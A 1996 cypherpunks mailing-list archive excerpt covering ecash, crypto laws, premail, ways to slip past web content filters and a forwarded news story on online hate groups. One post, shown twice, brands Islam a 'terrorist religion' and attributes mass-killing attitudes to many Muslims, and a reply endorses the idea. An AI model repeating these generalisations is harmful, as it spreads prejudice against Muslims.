Content-Type: text/plain



	Are there any publically available word lists which contain just about
every word in the English language?  It's not absolutley necessary, but I'd also
like the list to include english names.

Thanks in advance.


begin 644 tagline.txt
enum MicrosoftBoolean {TRUE, FALSE, MAYBE};
Greg Miller: Programmer/Analyst (gregmi@mis.net)
http://grendel.ius.indiana.edu/~gmiller/
end.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Fri, 5 Jul 1996 10:30:11 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Net and Terrorism.
In-Reply-To: <ae013a2a030210040b66@[205.199.118.202]>
Message-ID: <Pine.3.89.9607041641.A26312-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 4 Jul 1996, Timothy C. May wrote:

> At 5:58 AM 7/4/96, attila wrote:
> 
> >        U.S. cash has eliminated a lot of Soviet weapons, including, I
> >believe
> >    some chemical.  however, keep in mind: the obsolete, and expensive to
> >    maintain, hardware predominated.  However, you will never be able to
> >buy out
> >    the religious terrorists --they are on a "mission."
> >
> >        The Western world faces far more threat from fundamentalist religious
> >    terrorists than it does from the Soviet Union, etc.
> >
> >        There is no cure for the "revolutionary" terrorists --just death
> >for their
> >    own brand of glory.  If we do not even print their obit, there is no glory!
> 
> I recall that Attila is one of several Mormons on the list, from a recent
> thread where I happened to mention Mormons as an example (and got comments,
> including a statement that "Mormon" is a slur).
> 
> Anyway, I should point out that Mormons (or Latter Day Saints, I guess) are
> spreading quickly around the world...all WITHOUT using "conversion by the
> sword," as some other well-known religions are wont to do.
> 
> Islam, notably, was known for this policy of conversion by the sword:
> entire national populations were given the choice of converting to Islam or
> being put to the sword. Most converted, naturally enough.
> 
> (cf. various histories, incl. Wright's "Sacred Rage.")
> 
> Islam is one of the religions teaching that "martyrs" go directly to
> Paradise/Heaven/Valhalla. A terrorist who explodes himself goes directly to
> sit at Allah's dinner table. His relatives, too, as I understand their
> beliefs, though the surviving relatives have to wait until they die to get
> this benefit.
> 
> Further, if a large Middle Eastern city, e.g., Tel Aviv or Haifa, were to
> be nuked by Believers, then all of the vaporized Muslims in the city would
> automatically be martyred, and would also go to Paradise. This makes it
> more "acceptable" to Believers to hit targets which may contain their own
> kind. (The famous "Kill them all and let God sort them out" line really
> does apply to many Muslims.)
> 
> (Two other religions come to mind as having similar beliefs about death in
> battle and afterlives: the Viking "berserkers" circa 800-1100 A.D. and the
> Japanese/Shinto suicide pilots in WW2. I'm sure there are other examples.)
> 
> Most other religions which have strong beliefs about an afterlife,
> including Mormons, Catholics, and other flavors of Christianity,
> nevertheless have not adopted this "martyr" concept. This may explain why
> few suicide bombings and suchlike come from these groups.
> 
> (There are exceptions. Many Christian sects believe that abortion is
> immoral and a grave sin, and that those who bomb or shoot up abortion
> clinics, a la John Salvi, are doing God's work and are ensured a place in
> Heaven. Personally, I expect to see more such "terrorist" acts in the
> coming decades, in the U.S.)
> 
> Calling a spade a spade, Islam is in some sense a "terrorist religion," in
> that physical force is seen by many Muslims as a legitimate mechanism of
> conversion. The wrinkle that those who die in the service of Allah go
> directly to sit at his side is of course a major incentivizing factor for
> more truck bombs, nerve gas attacks, and even nukings.
> 
> We should all be thankful that Mormons, as economically powerful and as
> well-organized as they are, steer far clear of this kind of recruiting and
> service to their beliefs.
> 
> (It's been 30 years since I've been in Salt Lake City, but I understand
> that strip clubs exist there--from reading certain news groups!--and that
> alcohol is not illegal there. This government tolerance of things inimical
> to the dominant religion would be unthinkable in, say, Mecca.)
> 
> There are of course other flavors of Islam, including arts-loving,
> peace-loving, and scholarly sorts. The propagation of science and math
> through the Dark Ages owes much to Arabic scholars, of course. Hence, we
> cannot blanketly condemn Islam.
> 
> However, for the sake of the discussion about terrorism, it's important to
> recognize that some significant fraction of Muslims believe these notions
> of martrydom and are willing to engage in horrific acts to accomplish
> certain ends.
> 
> (The Arab world is very poorly connected to the Net at this time. It'll be
> interesting to see what happens if and when they become well-connected,
> with PGP, remailers, information markets, etc.)
> 
> --Tim May
> 

Normally I would snip a bit to save bandwidth, but your comments, 
abreviated, would not be as effective.

My cousin is attached to one of the Ranger companies that went to 
Somalia, among other "friendly" vacation spots. He told me that just 
prior to moving out to rescue 6 men pinned down at 900 m by sniper fire, 
his CO instructed them that these snipers were muslim and considered it 
an honor to die for their religion. His last words to them were: "Tell 
them 'Go with God', then fire!"

As far as John was concerned it was a win-win situation...

...Paul

BTW, Attila, this was one of the companies Eric had to help pull out of 
the fire, created courtesy of the UN and the Pakistani CO for that 
attachment. But that's an interesting story for another time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Fri, 5 Jul 1996 10:23:03 +0800
To: CyberEyes <cypherpunks@toad.com
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
Message-ID: <1.5.4.16.19960704232543.3a3f1d7c@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01.30 PM 7/4/96 -0400, CyberEyes wrote:

>	The child would also be able to use the Anonymizer at
>http://www.anonymizer.com. But, is it that easy to redirect? Just type
>that little rd command? What others are there? I've seen &lt and &gt in
>use, what do they perform?

No, but in things like Yahoo and Alta Vista, when they have those ads,
look at the URL assigned to the ad. It redirects you through the service
you're using rather than send you straight there. I don't know why. I
was just using an example....

Since HTML uses the < and > (less-than and greater-than) characters in
the code, you use the &lt; and &gt; to print one of these characters
and not use it in the code.

===============================================================================
David Rosoff (nihongo o sukoshi dekiru)  ---------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Anonymous ok, PGP ok.  If it's not PGP-signed, you know that I didn't write it.
=== === === === === === === === === === === === === === === === === === === ===
"Truth is stranger than fiction, especially when truth is being defined by the
O.J. Simpson Defense Team." -Dave Barry

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdxKCxguzHDTdpL5AQFyaQP/VevSEcgSOqZ0I0XB7mFX5tKivwEpHQ4+
8zEBfUJTI7SZjZVSbo7dCa/4IRuk7NBrvI0bGHCyRqO7TPqOEZn9Po1eBFfg2I08
RZEVrE3EN1gm/rW32pJ/ocNLTH45mRqKEQoO8gZle509ZvkhiBzJuK8aXFn7hJn+
cgJeSUTfBmw=
=U3zk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Fri, 5 Jul 1996 10:29:36 +0800
To: CyberEyes <cyberia@cam.org>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
Message-ID: <1.5.4.16.19960704232548.0b77fbf4@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02.09 PM 7/4/96 -0400, you wrote:
>On Wed, 3 Jul 1996, Mark Rogaski wrote:
>
>> I would assume that the filters look for regexp's in the query string, too.
>> How about a nice little Nutscape plugin that uses a rot13'd query string?
>
>	Do you have a copy of that plugin? If it exists.
>
>> http://www.one.site.com/cgi-bin/sneaky-rd?uggc://jjj.cbeab-fvgr.pbz/
>> 
>> Hmmm, no bad words in the query string.  Of course the filter package would
>> start looking for rot13'd stuff in the next release.  So the next logical
>> step is to use the URL encrypted with the redirector's public key ... or
>> better yet, a dynamically generated key.  Just convert it to radix64 so
>> as to avoid ?'s &'s or ='s, and use that as the query string.  
>> 
>> The plug-in would only be necessary to generate the first request.  Any
>> URL preparation could be handled by passing the output of netcat through
>> a stream filter before sending it to the client.
>
>	That "creative child" would have to be pretty damn smart to do
>what you described.

It would actually take less creativity to do the other things, bypass the
config.sys, etc. The child would thus be perhaps a little TOO creative. :)

===============================================================================
David Rosoff (nihongo o sukoshi dekiru)  ---------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Anonymous ok, PGP ok.  If it's not PGP-signed, you know that I didn't write it.
=== === === === === === === === === === === === === === === === === === === ===
"Truth is stranger than fiction, especially when truth is being defined by the
O.J. Simpson Defense Team." -Dave Barry

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdxKohguzHDTdpL5AQEFIwQAuK9Ca8ImcDka9mYWht35h8NMSr2A/tfB
zvusZ8P5HIEYTbQ8GyRDQ3R+X58+k2pQmaCnO66EtI83mrVs+J9C8B7LoobroZpO
u2R0SnMMJVU6eQAnkABkgYaMLVamqEMG+n6qmk7NePjsawSBvOdtuH9dmccR1/Pi
+sGpQvT6RvI=
=vTir
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Jul 1996 04:04:11 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
Message-ID: <ae013a2a030210040b66@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:58 AM 7/4/96, attila wrote:

>        U.S. cash has eliminated a lot of Soviet weapons, including, I
>believe
>    some chemical.  however, keep in mind: the obsolete, and expensive to
>    maintain, hardware predominated.  However, you will never be able to
>buy out
>    the religious terrorists --they are on a "mission."
>
>        The Western world faces far more threat from fundamentalist religious
>    terrorists than it does from the Soviet Union, etc.
>
>        There is no cure for the "revolutionary" terrorists --just death
>for their
>    own brand of glory.  If we do not even print their obit, there is no glory!

I recall that Attila is one of several Mormons on the list, from a recent
thread where I happened to mention Mormons as an example (and got comments,
including a statement that "Mormon" is a slur).

Anyway, I should point out that Mormons (or Latter Day Saints, I guess) are
spreading quickly around the world...all WITHOUT using "conversion by the
sword," as some other well-known religions are wont to do.

Islam, notably, was known for this policy of conversion by the sword:
entire national populations were given the choice of converting to Islam or
being put to the sword. Most converted, naturally enough.

(cf. various histories, incl. Wright's "Sacred Rage.")

Islam is one of the religions teaching that "martyrs" go directly to
Paradise/Heaven/Valhalla. A terrorist who explodes himself goes directly to
sit at Allah's dinner table. His relatives, too, as I understand their
beliefs, though the surviving relatives have to wait until they die to get
this benefit.

Further, if a large Middle Eastern city, e.g., Tel Aviv or Haifa, were to
be nuked by Believers, then all of the vaporized Muslims in the city would
automatically be martyred, and would also go to Paradise. This makes it
more "acceptable" to Believers to hit targets which may contain their own
kind. (The famous "Kill them all and let God sort them out" line really
does apply to many Muslims.)

(Two other religions come to mind as having similar beliefs about death in
battle and afterlives: the Viking "berserkers" circa 800-1100 A.D. and the
Japanese/Shinto suicide pilots in WW2. I'm sure there are other examples.)

Most other religions which have strong beliefs about an afterlife,
including Mormons, Catholics, and other flavors of Christianity,
nevertheless have not adopted this "martyr" concept. This may explain why
few suicide bombings and suchlike come from these groups.

(There are exceptions. Many Christian sects believe that abortion is
immoral and a grave sin, and that those who bomb or shoot up abortion
clinics, a la John Salvi, are doing God's work and are ensured a place in
Heaven. Personally, I expect to see more such "terrorist" acts in the
coming decades, in the U.S.)

Calling a spade a spade, Islam is in some sense a "terrorist religion," in
that physical force is seen by many Muslims as a legitimate mechanism of
conversion. The wrinkle that those who die in the service of Allah go
directly to sit at his side is of course a major incentivizing factor for
more truck bombs, nerve gas attacks, and even nukings.

We should all be thankful that Mormons, as economically powerful and as
well-organized as they are, steer far clear of this kind of recruiting and
service to their beliefs.

(It's been 30 years since I've been in Salt Lake City, but I understand
that strip clubs exist there--from reading certain news groups!--and that
alcohol is not illegal there. This government tolerance of things inimical
to the dominant religion would be unthinkable in, say, Mecca.)

There are of course other flavors of Islam, including arts-loving,
peace-loving, and scholarly sorts. The propagation of science and math
through the Dark Ages owes much to Arabic scholars, of course. Hence, we
cannot blanketly condemn Islam.

However, for the sake of the discussion about terrorism, it's important to
recognize that some significant fraction of Muslims believe these notions
of martrydom and are willing to engage in horrific acts to accomplish
certain ends.

(The Arab world is very poorly connected to the Net at this time. It'll be
interesting to see what happens if and when they become well-connected,
with PGP, remailers, information markets, etc.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 5 Jul 1996 11:29:23 +0800
To: cypherpunks@toad.com
Subject: Re:  What remains to be done.
In-Reply-To: <199607042102.OAA26752@jobe.shell.portal.com>
Message-ID: <Pine.GUL.3.94.960704174410.15214C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Jul 1996, Hal wrote:

> It would seem that an equally effective method would be to use no
> encryption, but just a secret URL, one which is not linked to from
> elsewhere - an "island in the net", so to speak (apologies to Bruce
> Sterling).

The URL would still be visible in your ISP's http log and, in som cases, to
other users of the ISP. You'd have to cont on low traffic and little
interest from other users in your ISP from browsing the world-readable bits
of your home directory.

A case of an ISP closing someone's account because of an objection to an
unliked gif was sent to Declan's fight-censorship list a few days ago.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 5 Jul 1996 11:47:16 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: ecash thoughts
Message-ID: <199607050111.SAA17969@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:26 PM 7/4/96 -0400, Mark M. wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Wed, 3 Jul 1996, jim bell wrote:
>
>> At 05:53 PM 7/3/96 -0400, Simon Spero wrote:

>> Low, maybe a tenth of an American cent.  But probabilistic payment should be 
>> used to allow the minimum average payment to go way below this, perhaps to 
>> an unlimited extent.  The reason is simple:  The cost of providing net 
>> transactions, and electronic transactions in general, can be expected to 
>> drop exponentially, just like the cost of telecommunications and CPU power 
>> do.  Any arbitrary limit to how low they can go will act somewhat akin to 
>> the minimum wage:  It will deter development of any product or service whose 
>> perceived value is less than this arbitrary minimum.
>
>If the value of a Turing is one tenth of an American cent, then it would
>actually just be a pseudocurrency backed by U.S. dollars. 

I should have said, "about a tenth of a cent."  I didn't mean to imply a linkage.

>The inflation of
>ecash would be the same as the inflation of U.S. money.  However, I do agree
>that the value of one unit should be low.
>
>You use Moore's Law to state that the cost of electronic transactions drops
>exponentially.  However, this is only true if the electronic transactions
>use the same amount of bandwidth.  As chip processing speed and transmission
>bandwidth double, the cost of building the equipment also doubles.

At any given time, that's true, but over time the cost of that processing 
(per unit transaction) will drop, probably in some exponential fashion.  

For an optical fiber transmission system, the cost of the fiber does NOT go 
up with the speed, since it's nowhere near its limiting capacity.  
End-termination systems will be more expensive, but I suspect that's a 
relatively small fraction of the overall cost.  

CPU cost will be significant, but then again the Moore's law trend will 
predominate.  CPU's probably have 1000 times the power, per unit cost, than 
they did in 1980 or so.  It would probably be over-optimistic to think that 
they'll drop the same ratio over the next 15 or so years, but it'll be 
enough of a reduction so that whatever costs appear to be limits today won't 
be then.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 5 Jul 1996 13:17:47 +0800
To: cypherpunks@toad.com
Subject: Philly Inquirer: More old, conterfactual "Hate on the Net" "news"
Message-ID: <Pine.GUL.3.94.960704184517.16089A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


This is fucking amazing. In the last month, the two most well-known young
neo-Nazi activists on the net, having been exposed to a true diversity of
opinion and true free speech on the Internet, repudiated their former
beliefs (I'm buying one of them a beer next week); the most well-known
neo-Nazi propagandist on the net, frustrated by having her daily newsletter
posted publicly to Usenet, lashes out at DejaNews for building a case
against her (she knows her own words are her best refutation); and serious
attempts by neo-Nazis to rmgroup and vertical-spam two newsgroups where
neo-Nazi movements are discussed and refuted failed without a single
spam-cancel or account closure that could be mischaracterized as
"censorship." 

And yet Reid comes out with the old Horsemen fear-mongering about "Hate on
the Net." He even quotes an old piece from *former* net.nazi Milton Kleim
WHICH MILTON NO LONGER SUPPORTS.

The Dreaded Nazi Threat to the Net is in disarray, and the totally
discredited and impotent kook Don Black (the man who would be king of the
island of Dominica, but his coup failed) gets a front-page story in the
Philadelphia Inqirer to sneer at America on July 4th. Unbelievable. No
wonder Don was happy to send the full text of the article, below, to his
ever-shrinking pool of supporters (and others) on his Stormfront mailing
list (send "archive stormfront-l" in the body of a message to
listserv@stormfront.org if you'd like to browse the last 100 messages, half
of which talk about the recent breakdown in "the movement"). 

It seems they're determined to beat on the Four Horsemen even when
it's patently obvious that they're dead. 

Reid Kanaley's email address is rkanaley@voicenet.com, but it seems he's
only interested in talking to "experts" who are way, way out of touch with
current events. 

-rich
 censor internet now! http://www.stanford.edu/~llurch/potw2/
 boycott fadetoblack! http://www.fadetoblack.com/prquest.htm

---------- Forwarded message ----------
Date: Thu,  4 Jul 1996 11:13:53 GMT
From: "don.black" <dblack@jbx.com>
To: rich@c2.org
Subject: SF: More "Hate on the Net" news

>From this morning's Philadelphia Inquirer
<http://www2.phillynews.com/inquirer/96/Jul/04/front_page/HATE04.htm>...
Happy Independence Day!  --Don
                                                               Page One
                                                 Thursday, July 4, 1996

                Hate groups reaching vast Internet audience
They are reaching a vast audience. Some Web sites are ``very, very slick
                             says an observer.

                              By Reid Kanaley
                           INQUIRER STAFF WRITER

Don Black, who was once national director of the Knights of the Ku Klux
Klan and now runs a site on the World Wide Web called Stormfront,
recognized early that the Internet was the place to be.

``The potential of the Net for organizations and for movements such as
ours is enormous,'' Black, 42, of West Palm Beach, Fla., said in an
interview. ``We're reaching tens of thousands of people who never before
have had access to our point of view.''

Those who monitor the activities of extremists such as right-wing
militias, neo-Nazis, Holocaust-denial groups and others agree that the
Internet is proving irresistible to those organizations for
communication, propaganda and recruitment.

In a written response to an interview request e-mailed to Minuteman
Press Online, a militia-oriented Web site, someone identified as R.A.
Mann declined to be interviewed yesterday, but added:

``Militias use the Internet in the same way other groups do: data
verification, urgent updates, tips on everything, legislation overviews,
etc.''

Begun in the late 1980s as an electronic bulletin board for the
so-called ``white nationalist'' movement, Stormfront was moved by Black
to the Web in March 1995. The site is decorated with German-gothic text,
white-pride graphics, and letters urging African Americans to thank
whites for slavery.

``At the time of the Oklahoma City bombing [ in April 1995 ] , maybe two
or three racist groups had Web pages,'' said Rick Eaton, senior
researcher at the Simon Wiesenthal Center in Los Angeles. ``There are
now dozens, if not over 100 outright racist Web pages. There's a lot of
new players that we never saw before, and most importantly there is a
sense of communication and instant gratification -- that they're not
alone.''

And many of their online efforts amount to ``very sophisticated
advertisements for their groups,'' said Paul V. Fleming, a mass
communications graduate student at Oklahoma State University, who has
co-authored a research paper on Internet hate speech. ``Some of these
sites are just very, very slick,'' with good graphics and downloadable
``hate music,'' Fleming said.

Several watchdog groups, including the Anti-Defamation League and the
Wiesenthal Center, are attempting to closely monitor hate speech on the
Internet.

The Wiesenthal Center, Eaton said, now focuses up to 80 percent of its
research activity on the worldwide linkage of computer networks where
cheap, unfettered and often anonymous global discourse points up both
the blessings and curses of free speech.

Black said he oversees an e-mail discussion group with 380 subscribers
and an electronic mailing list for 1,200 people. But since March of 1995
he says his web site has been visited by thousands more.

``What we've done is begin to break that monopoly'' of the mainstream
media, said Black. ``Anyone, of course, can set up a Web page, and in
our case we've been pretty successful at it as far as the traffic we've
gotten.''

``Up to now, you had a guy like Don Black . . . sitting there and
basically playing at being a Nazi when the lights are out. Now all of a
sudden there is a double sense of empowerment: Their message,
theoretically, gets out to hundreds of thousands or millions of people .
. . and they're in touch with each other instantaneously,'' said Mark
Weitzman, director of the Wiesenthal Center's Task Force Against Hate.

Groups serious about using violence are not likely to be using the
relatively insecure Internet to communicate, several experts said. Eaton
said he had not previously heard the names of any of those arrested this
week as part of an alleged plot by the Viper Militia in Arizona to bomb
buildings in Phoenix.

Were the Vipers on the Internet? ``Nope, I can't find 'em,'' said
Richard Bash of Portland, Oregon, who maintains an electronic mailing
list for the academic discussion of terrorism, and is writing a doctoral
dissertation about militias.

Most extremist-group members are ``blowhards'' who migrated from such
innocuous activities as ``bowling leagues.'' Rarely, he said, do they
pose a threat to society.

Weitzman said, however, that increasing electronic communication among
these extremists could be inspiring more to violence. ``With the arrests
in Arizona, you see more people willing to go to the extreme,'' he said.
``As the communications increase between them, there is a sense: We have
this link, we can start doing something about society.''

He said impressionable young people are the propaganda targets of many
extremist groups. ``They see the Internet as an incredible recruiting
tool. It is wide open for kids and, essentially, the younger the better,
because they can get them before they develop all the intellectual
resources to combat what they're saying,'' Weitzman said.

``Organizations have recruited through Stormfront, and through their Web
pages that we've linked to,'' said Black.

Some experts say that the nature of the Internet makes it difficult to
stumble upon extremist material without looking for it. But Eaton
contests that.

He pointed out that a Web search for the term ``Talmud'' on the Infoseek
service turns up a page from Stormfront titled ``The Talmud: Judaism's
holiest book documented and exposed,'' in the top 10 of 353 references.

In another search, the first and third of 415 references found for the
word, ``Auschwitz,'' were links to the Web site of an organization that
denies the Holocaust took place.

And an online essay by white supremacist Milton Kleim Jr., 25, of
Roseville, Minn., urges a campaign by ``cyber guerrillas'' to
proselytize in the Internet discussion groups called Usenet news groups:

``Usenet offers enormous opportunity for the Aryan Resistance to
disseminate our message to the unaware and the ignorant . . . We MUST
move out beyond our present domain, and take up positions on
`mainstream' groups.''

In his paper titled ``An Examination of Hate Speech, Censorship and the
First Amendment on the Internet,'' presented in March to a Las Vegas
conference on American popular culture, Fleming and co-author Torey
Lightcap said, ``The Internet is accused of not only giving hate groups
an uncontrolled platform but also legitimizing them.''

But the paper concludes that ``like the non-electronic world, citizens
of cyberspace will probably have to live with hate speech as one of its
liabilities in order to enjoy the wide range of benefits the Internet
offers.''

Cyberspace libertarians severely criticized the Wiesenthal Center
earlier this year when it sent thousands of letters to Internet service
providers asking them to deny Web space to hate groups. Eaton said he
was disappointed that barely a score of providers responded.

``We would like to see providers say, `This stuff is crap, and we're not
going to put it on,''' he said.

------------------------------------------------------------------------
To: Multiple recipients of the Stormfront-L Mailing List
Host: Don Black <dblack@mail.stormfront.org> Finger for PGP public key.
Post to 'Stormfront-L@stormfront.org' with 'SF:' prepending the subject.
To unsubscribe, send e-mail to 'Listserv@stormfront.org' with the line
'unsubscribe Stormfront-L' in the message BODY, not the subject.
------------------------------------------------------------------------

-----
Processed with Listserv v2.92 for Wildcat v4





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Fri, 5 Jul 1996 12:51:19 +0800
To: simsong@vineyard.net (Simson L. Garfinkel)
Subject: Re: Restrictions on crypto overseas
In-Reply-To: <v02130500ae01f5f9117d@[199.232.252.124]>
Message-ID: <199607050215.TAA22048@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	In many countries there are none. France is pretty bad.

> Greetings.
> 
> I am looking for a concise description of the restrictions overseas on the
> use of cryptography, and how those restrictions affect the operation of a
> cryptographically-enabled web server.
> 
> I have been told that users of programs like PGP in france are required by
> law to register their secret keys with the state security apparatus. Does
> this mean that users of secure web servers need to register their secret
> keys as well? Is anybody doing this? Is the law enforced?
> 
> What about other nations that have recently passed restrictions on the use
> of crypto? Other than Russia, which are they? Is there a list anywhere?
> 
> Thanks.
> 
> 
> ======
> Simson's Summer Info:
> 
> Mailing: 304 Newbury Street, #503, Boston, MA 02115.  617-876-6111
> Summer Salon: 236 Marlborough St. #2 Boston MA 02116.
> 
> 


-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Fri, 5 Jul 1996 12:51:07 +0800
To: mail2news@myriad.alias.net
Subject: Announcing the release of premail 0.44
Message-ID: <199607050216.TAA16873@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


   The long awaited release of premail 0.44 is now available. This
release integrates PGP and anonymous e-mail functions into Unix
versions of Netscape 3.0's built-in mailer. It also does a pretty good
job with Pine 3.94 (transparent integration of plain PGP mail,
decoding of MIME protected mail requires a single command).

   For those of you interested in experimenting with S/MIME, it
contains some S/MIME functions, but does not yet fully comply with the
standard.

   The main premail Web page is:

       http://www.c2.net/~raph/premail.html

   The premail documentation is at:

       http://www.c2.net/~raph/premail/

   I appreciate any bug reports, suggestions, or comments.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 5 Jul 1996 13:10:56 +0800
To: cypherpunks@toad.com
Subject: Altair emulator?
Message-ID: <199607050234.TAA20461@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


So you always wanted to run an Altair...

http://www.nwlink.com/~tigger/altair.html
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 5 Jul 1996 11:16:43 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: ecash thoughts
In-Reply-To: <199607040424.VAA02562@mail.pacifier.com>
Message-ID: <Pine.LNX.3.94.960704201924.160A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 3 Jul 1996, jim bell wrote:

> At 05:53 PM 7/3/96 -0400, Simon Spero wrote:
> 
> >2) If ecash is used to create a new currency- i.e. the value of a unit of 
> >the ecash is not tied to any single existing currency, what should the 
> >value of one currency unit  be set at? (let's call it a Turing)
> 
> Low, maybe a tenth of an American cent.  But probabilistic payment should be 
> used to allow the minimum average payment to go way below this, perhaps to 
> an unlimited extent.  The reason is simple:  The cost of providing net 
> transactions, and electronic transactions in general, can be expected to 
> drop exponentially, just like the cost of telecommunications and CPU power 
> do.  Any arbitrary limit to how low they can go will act somewhat akin to 
> the minimum wage:  It will deter development of any product or service whose 
> perceived value is less than this arbitrary minimum.

If the value of a Turing is one tenth of an American cent, then it would
actually just be a pseudocurrency backed by U.S. dollars.  The inflation of
ecash would be the same as the inflation of U.S. money.  However, I do agree
that the value of one unit should be low.

You use Moore's Law to state that the cost of electronic transactions drops
exponentially.  However, this is only true if the electronic transactions
use the same amount of bandwidth.  As chip processing speed and transmission
bandwidth double, the cost of building the equipment also doubles.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMdxhVrZc+sv5siulAQEvXQP9EpchmkFK5dlxzwGP73oh02ATNzrVfl+N
nB7BrpT/Ord5cUYk9vVFVdqZ4w3rW+/uV0QQaPE+GOeDH5bnDtX7nBGBQp72TpVl
Bwy+b6cuHuPMjivMSqHfOcSLhXXDO3Km+35dxx77FNOWa4MI2rgDtUdqjXOocaiR
puGEgEosYDI=
=6UK5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 5 Jul 1996 11:34:52 +0800
To: cypherpunks@toad.com
Subject: Moviepunks
Message-ID: <2.2.32.19960705005530.00849e80@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Not much crypto or any networking in "Independence Day."  It does have a
code name, however, "ID4."  Disabled the mothership with computer viruses
(highly unlikely.)  Used a Mac Powerbook but no Apple logos showed.  Film
has mass appeal, however and some good bits.  Good for teaching people that
if 15-mile-wide spacecraft position themselves above your town--leave.

The Net did get me into the film however without waits.  Fired up
www.777film.com at 1600 hrs, ordered tickets for the 1700 hrs showing, get
to the theater, walked past lines into the lobby to use ATM, stuck in card,
got tickets, went into theater.  Dodged mob scene.

Saw a preview of "Ransom" starring Mel Gibson in a remake of the 1956 Glenn
Ford film of the same name.  First ransom "note" appears to be a multimedia
file (delivered by the Net?).

DCF

"Somehow, I doubt William Jefferson Blythe Clinton would fly an F-15 against
a monster alien craft."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 5 Jul 1996 11:32:57 +0800
To: cypherpunks@toad.com
Subject: Who was that Masked Cypherpunk?
Message-ID: <2.2.32.19960705005731.00858d68@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


OK, fess up.  Who was it who amended the anti-key-escrow language of the
Libertarian Party Platform live on CSPAN?  Specific reference to cypherpunks.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinnie moscaritolo <vinnie@webstuff.apple.com>
Date: Fri, 5 Jul 1996 13:15:04 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <v03007602ae022c3bbfd1@[38.26.2.85]>
MIME-Version: 1.0
Content-Type: text/plain


